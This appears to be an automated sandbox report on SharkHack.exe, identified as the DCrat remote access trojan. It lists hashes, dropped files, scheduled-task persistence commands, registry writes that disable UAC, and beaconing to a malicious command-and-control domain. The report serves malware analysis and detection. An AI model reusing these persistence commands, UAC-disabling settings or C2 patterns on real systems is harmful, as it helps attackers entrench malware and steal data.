| File name: | SharkHack.exe |
| Full analysis: | https://app.any.run/tasks/b061619d-0644-463f-8ec2-705bc6960435 |
| Verdict: | Malicious activity |
| Threats: | DCrat, also known as Dark Crystal RAT, is a remote access trojan (RAT), which was first introduced in 2018. It is a modular malware that can be customized to perform different tasks. For instance, it can steal passwords, crypto wallet information, hijack Telegram and Steam accounts, and more. Attackers may use a variety of methods to distribute DCrat, but phishing email campaigns are the most common. |
| Analysis date: | October 30, 2024, 16:20:00 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/vnd.microsoft.portable-executable |
| File info: | PE32 executable (GUI) Intel 80386, for MS Windows, 6 sections |
| MD5: | D700671D6797CAC4C1DFD0843DDBDC6E |
| SHA1: | 74A41E4748744D6611EF6467B3600B729AE740F9 |
| SHA256: | 945EF9CA875BA5D7DCBB7B58CA05957E6699BE76FD1F00902C4796EA343C3E11 |
| SSDEEP: | 98304:+FrKdnhbMptYrMaWh/Fu4r3WZS358kAjag66OUcf0E5TdYI5gMKVWaMXyQX822PY:+tjwnWIyB |
| .exe | | | Win32 Executable (generic) (52.9) |
|---|---|---|
| .exe | | | Generic Win/DOS Executable (23.5) |
| .exe | | | DOS Executable Generic (23.5) |
| MachineType: | Intel 386 or later, and compatibles |
|---|---|
| TimeStamp: | 2020:12:01 18:00:55+00:00 |
| ImageFileCharacteristics: | Executable, 32-bit |
| PEType: | PE32 |
| LinkerVersion: | 14 |
| CodeSize: | 201216 |
| InitializedDataSize: | 98304 |
| UninitializedDataSize: | - |
| EntryPoint: | 0x1ec40 |
| OSVersion: | 5.1 |
| ImageVersion: | - |
| SubsystemVersion: | 5.1 |
| Subsystem: | Windows GUI |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 204 | C:\WINDOWS\system32\cmd.exe /c ""C:\agentproviderServerDriverdll\IFBhvLZxnRyQUVm8kiNe.bat" " | C:\Windows\SysWOW64\cmd.exe | — | wscript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 944 | "C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\61472823-3a98-4d87-a44f-71c120ee46f9.vbs" | C:\Windows\System32\wscript.exe | — | SearchApp.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.812.10240.16384 Modules
| |||||||||||||||
| 1196 | schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 6 /tr "'C:\found.000\dir_00000002.chk\fontdrvhost.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Task Scheduler Configuration Tool Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1376 | schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 7 /tr "'C:\agentproviderServerDriverdll\SearchApp.exe'" /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Task Scheduler Configuration Tool Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1700 | schtasks.exe /create /tn "ctfmon" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\Offline\ctfmon.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Task Scheduler Configuration Tool Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2312 | "C:\WINDOWS\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca | C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Shell Experience Host Version: 10.0.19041.3758 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2428 | C:\agentproviderServerDriverdll\Bridgecontainercomponent.exe | C:\agentproviderServerDriverdll\Bridgecontainercomponent.exe | cmd.exe | ||||||||||||
User: admin Integrity Level: HIGH Exit code: 0 Version: 5.15.2.0 Modules
| |||||||||||||||
| 2464 | "C:\agentproviderServerDriverdll\Bridgecontainercomponent.exe" | C:\agentproviderServerDriverdll\Bridgecontainercomponent.exe | — | cmd.exe | |||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Version: 5.15.2.0 Modules
| |||||||||||||||
| 2708 | schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 6 /tr "'C:\Recovery\Logs\Registry.exe'" /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Task Scheduler Configuration Tool Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2888 | schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 11 /tr "'C:\found.000\dir0000.chk\winlogon.exe'" /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Task Scheduler Configuration Tool Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| (PID) Process: | (5748) SharkHack.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbe\OpenWithProgids |
| Operation: | write | Name: | VBEFile |
Value: | |||
| (PID) Process: | (2428) Bridgecontainercomponent.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System |
| Operation: | write | Name: | EnableLUA |
Value: 0 | |||
| (PID) Process: | (2428) Bridgecontainercomponent.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System |
| Operation: | write | Name: | ConsentPromptBehaviorAdmin |
Value: 0 | |||
| (PID) Process: | (2428) Bridgecontainercomponent.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System |
| Operation: | write | Name: | PromptOnSecureDesktop |
Value: 0 | |||
| (PID) Process: | (2428) Bridgecontainercomponent.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Action Center\Checks\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.check.0 |
| Operation: | write | Name: | CheckSetting |
Value: 23004100430042006C006F00620000000000000000000000010000000000000000000000 | |||
| (PID) Process: | (2312) ShellExperienceHost.exe | Key: | \REGISTRY\A\{6bc3fa7e-a434-1c1b-d134-6b4184829ff4}\LocalState |
| Operation: | write | Name: | PeekBadges |
Value: 5B005D0000004663459CE72ADB01 | |||
| (PID) Process: | (2428) Bridgecontainercomponent.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\f469511a723948c98cb7b63acdbb2edf42096529 |
| Operation: | write | Name: | 0608fca9e57eb05b6d1f31c264c2a687f1e95f25 |
Value: WyJDOlxcYWdlbnRwcm92aWRlclNlcnZlckRyaXZlcmRsbFxcQnJpZGdlY29udGFpbmVyY29tcG9uZW50LmV4ZSIsIkM6XFxQcm9ncmFtIEZpbGVzXFxXaW5kb3dzIERlZmVuZGVyXFxPZmZsaW5lXFxjdGZtb24uZXhlIiwiQzpcXGZvdW5kLjAwMFxcZGlyMDAwMC5jaGtcXHdpbmxvZ29uLmV4ZSIsIkM6XFxmb3VuZC4wMDBcXGRpcl8wMDAwMDAwMi5jaGtcXGZvbnRkcnZob3N0LmV4ZSIsIkM6XFxQcm9ncmFtIEZpbGVzICh4ODYpXFxXaW5kb3dzUG93ZXJTaGVsbFxcQ29uZmlndXJhdGlvblxcU2NoZW1hXFxTeXN0ZW1TZXR0aW5ncy5leGUiLCJDOlxcYWdlbnRwcm92aWRlclNlcnZlckRyaXZlcmRsbFxcU2VhcmNoQXBwLmV4ZSIsIkM6XFxSZWNvdmVyeVxcTG9nc1xcUmVnaXN0cnkuZXhlIiwiQzpcXGZvdW5kLjAwMFxcZGlyMDAwMC5jaGtcXFdhYVNNZWRpY0FnZW50LmV4ZSIsIkM6XFxSZWNvdmVyeVxcT0VNXFxJZGxlLmV4ZSJd | |||
| (PID) Process: | (5612) SearchApp.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System |
| Operation: | write | Name: | EnableLUA |
Value: 0 | |||
| (PID) Process: | (5612) SearchApp.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System |
| Operation: | write | Name: | ConsentPromptBehaviorAdmin |
Value: 0 | |||
| (PID) Process: | (5612) SearchApp.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System |
| Operation: | write | Name: | PromptOnSecureDesktop |
Value: 0 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2428 | Bridgecontainercomponent.exe | C:\found.000\dir_00000002.chk\fontdrvhost.exe | executable | |
MD5:FC1109ED3FCE1E55642C57B550376210 | SHA256:C4A6418597F7832EDB836729E23DB6F2F9F0D560DBC4DDF1FEA1EA883A9711ED | |||
| 5748 | SharkHack.exe | C:\agentproviderServerDriverdll\IFBhvLZxnRyQUVm8kiNe.bat | text | |
MD5:36C98141E5014EB420B1D71E65F3BC0B | SHA256:2D9E208774B5A6DCF80C444D80714C6AC57426829C671F1A7A6C736759864D02 | |||
| 5748 | SharkHack.exe | C:\agentproviderServerDriverdll\Lk2YYsPDBp3mgHA3LWyVV9VWHS.vbe | vbe | |
MD5:DA7439CAD2F3E7D67E47E8A8D7B4CC46 | SHA256:E93A930BD6AB34E1923206FA3C73611EF5D988E24ADC3021098897148ABC2FD5 | |||
| 5748 | SharkHack.exe | C:\agentproviderServerDriverdll\Bridgecontainercomponent.exe | executable | |
MD5:FC1109ED3FCE1E55642C57B550376210 | SHA256:C4A6418597F7832EDB836729E23DB6F2F9F0D560DBC4DDF1FEA1EA883A9711ED | |||
| 2428 | Bridgecontainercomponent.exe | C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\SystemSettings.exe | executable | |
MD5:FC1109ED3FCE1E55642C57B550376210 | SHA256:C4A6418597F7832EDB836729E23DB6F2F9F0D560DBC4DDF1FEA1EA883A9711ED | |||
| 2428 | Bridgecontainercomponent.exe | C:\found.000\dir_00000002.chk\5b884080fd4f94 | text | |
MD5:8E171B62CDC97875C34BD3D851937BB5 | SHA256:20F2C1D8CE3A83A272E8D431086F924F89693C912CFD9241BDF05586A557B815 | |||
| 2428 | Bridgecontainercomponent.exe | C:\Program Files\Windows Defender\Offline\ctfmon.exe | executable | |
MD5:FC1109ED3FCE1E55642C57B550376210 | SHA256:C4A6418597F7832EDB836729E23DB6F2F9F0D560DBC4DDF1FEA1EA883A9711ED | |||
| 2428 | Bridgecontainercomponent.exe | C:\found.000\dir0000.chk\cc11b995f2a76d | text | |
MD5:960BFB474B403A6D3175A8880138F4CD | SHA256:AE90078CA69D8EB8D3E0FE4704DCCD7340177D99FD0AEF3D022A0D22622C9150 | |||
| 2428 | Bridgecontainercomponent.exe | C:\agentproviderServerDriverdll\SearchApp.exe | executable | |
MD5:FC1109ED3FCE1E55642C57B550376210 | SHA256:C4A6418597F7832EDB836729E23DB6F2F9F0D560DBC4DDF1FEA1EA883A9711ED | |||
| 2428 | Bridgecontainercomponent.exe | C:\agentproviderServerDriverdll\38384e6a620884 | text | |
MD5:AC1EF9CFB1FAC4890A4EEC034F2CD4B6 | SHA256:CAB8AB14C0DD07017EB7716D4FDD70AF1F76A457BF21B37365E11EC4AACC195B | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
6944 | svchost.exe | GET | 200 | 2.16.164.9:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
6952 | SearchApp.exe | GET | 200 | 5.101.152.4:80 | http://vasilikq.beget.tech/L1nc0In.php?NbV3XfJTFoPOE=yQRalE2yVd2dCtu1MN9Dag&V2YHffk=eHMUUthcoeZF2A3cZiOcBOBQRF&iN7XSvnYVzYaHouVjAbTU85r6QIxQG=CPx9PrHGTOmimBIHxQ2bP0wlkRPaCn&3b239f727a3dafe961942102126f5d2c=5774ac238a541c855773544a2ff37d57&f11f309f68b3ac25d62721f7903b0dc0=AMiRGMwQ2NmFGN5EzYygDO4gTZlRGM1UDMmhjZzIjZiRzYjBjMwYWM&NbV3XfJTFoPOE=yQRalE2yVd2dCtu1MN9Dag&V2YHffk=eHMUUthcoeZF2A3cZiOcBOBQRF&iN7XSvnYVzYaHouVjAbTU85r6QIxQG=CPx9PrHGTOmimBIHxQ2bP0wlkRPaCn | unknown | — | — | whitelisted |
6232 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D | unknown | — | — | whitelisted |
4128 | SearchApp.exe | GET | 200 | 5.101.152.4:80 | http://vasilikq.beget.tech/L1nc0In.php?MtCNnFUnKyEfGvXDyaFqw0=fOvUqngIYptCW&OzyAPb41vtk18BxKR3VVh91uoAnq=0WtAKjlRphZdncCuyofUOY&qBVP8DWPxOL5W10ybM2lV613gyA=VIVbbgC9yUnNSSmPbhq380DIVw&3b239f727a3dafe961942102126f5d2c=5774ac238a541c855773544a2ff37d57&f11f309f68b3ac25d62721f7903b0dc0=AMiRGMwQ2NmFGN5EzYygDO4gTZlRGM1UDMmhjZzIjZiRzYjBjMwYWM&MtCNnFUnKyEfGvXDyaFqw0=fOvUqngIYptCW&OzyAPb41vtk18BxKR3VVh91uoAnq=0WtAKjlRphZdncCuyofUOY&qBVP8DWPxOL5W10ybM2lV613gyA=VIVbbgC9yUnNSSmPbhq380DIVw | unknown | — | — | whitelisted |
4128 | SearchApp.exe | GET | 200 | 5.101.152.4:80 | http://vasilikq.beget.tech/L1nc0In.php?MtCNnFUnKyEfGvXDyaFqw0=fOvUqngIYptCW&OzyAPb41vtk18BxKR3VVh91uoAnq=0WtAKjlRphZdncCuyofUOY&qBVP8DWPxOL5W10ybM2lV613gyA=VIVbbgC9yUnNSSmPbhq380DIVw&3b239f727a3dafe961942102126f5d2c=5774ac238a541c855773544a2ff37d57&f11f309f68b3ac25d62721f7903b0dc0=AMiRGMwQ2NmFGN5EzYygDO4gTZlRGM1UDMmhjZzIjZiRzYjBjMwYWM&MtCNnFUnKyEfGvXDyaFqw0=fOvUqngIYptCW&OzyAPb41vtk18BxKR3VVh91uoAnq=0WtAKjlRphZdncCuyofUOY&qBVP8DWPxOL5W10ybM2lV613gyA=VIVbbgC9yUnNSSmPbhq380DIVw | unknown | — | — | whitelisted |
6124 | SearchApp.exe | GET | 200 | 5.101.152.4:80 | http://vasilikq.beget.tech/L1nc0In.php?XX86lk6qya1StTE2=4tXhCRgVnKpGlVzZwYF7&y9iaJzu=shH9JN9a5&Gbl7ZQjNFC37=95aFuzG3bwF5niHbHz90C8fj0jR15&3b239f727a3dafe961942102126f5d2c=5774ac238a541c855773544a2ff37d57&f11f309f68b3ac25d62721f7903b0dc0=AMiRGMwQ2NmFGN5EzYygDO4gTZlRGM1UDMmhjZzIjZiRzYjBjMwYWM&XX86lk6qya1StTE2=4tXhCRgVnKpGlVzZwYF7&y9iaJzu=shH9JN9a5&Gbl7ZQjNFC37=95aFuzG3bwF5niHbHz90C8fj0jR15 | unknown | — | — | whitelisted |
6944 | svchost.exe | GET | 200 | 23.32.185.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
4360 | SearchApp.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D | unknown | — | — | whitelisted |
5612 | SearchApp.exe | GET | 200 | 5.101.152.4:80 | http://vasilikq.beget.tech/L1nc0In.php?wBbpPpiC=rOXTnbLkWo&3b239f727a3dafe961942102126f5d2c=5774ac238a541c855773544a2ff37d57&f11f309f68b3ac25d62721f7903b0dc0=AMiRGMwQ2NmFGN5EzYygDO4gTZlRGM1UDMmhjZzIjZiRzYjBjMwYWM&wBbpPpiC=rOXTnbLkWo | unknown | — | — | whitelisted |
5612 | SearchApp.exe | GET | 200 | 5.101.152.4:80 | http://vasilikq.beget.tech/L1nc0In.php?wBbpPpiC=rOXTnbLkWo&3b239f727a3dafe961942102126f5d2c=5774ac238a541c855773544a2ff37d57&f11f309f68b3ac25d62721f7903b0dc0=AMiRGMwQ2NmFGN5EzYygDO4gTZlRGM1UDMmhjZzIjZiRzYjBjMwYWM&wBbpPpiC=rOXTnbLkWo | unknown | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
— | — | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
1752 | RUXIMICS.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
5488 | MoUsoCoreWorker.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
6944 | svchost.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
6944 | svchost.exe | 2.16.164.9:80 | crl.microsoft.com | Akamai International B.V. | NL | whitelisted |
6944 | svchost.exe | 23.32.185.131:80 | www.microsoft.com | AKAMAI-AS | BR | whitelisted |
5612 | SearchApp.exe | 104.20.3.235:443 | pastebin.com | CLOUDFLARENET | — | shared |
5612 | SearchApp.exe | 5.101.152.4:80 | vasilikq.beget.tech | Beget LLC | RU | whitelisted |
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
pastebin.com |
| shared |
vasilikq.beget.tech |
| malicious |
www.bing.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
login.live.com |
| whitelisted |
th.bing.com |
| whitelisted |
PID | Process | Class | Message |
|---|---|---|---|
2172 | svchost.exe | Not Suspicious Traffic | INFO [ANY.RUN] Online Pastebin Text Storage |
5612 | SearchApp.exe | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET) |
6952 | SearchApp.exe | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET) |
4128 | SearchApp.exe | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET) |
6124 | SearchApp.exe | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET) |
6564 | SearchApp.exe | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET) |
5932 | SearchApp.exe | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET) |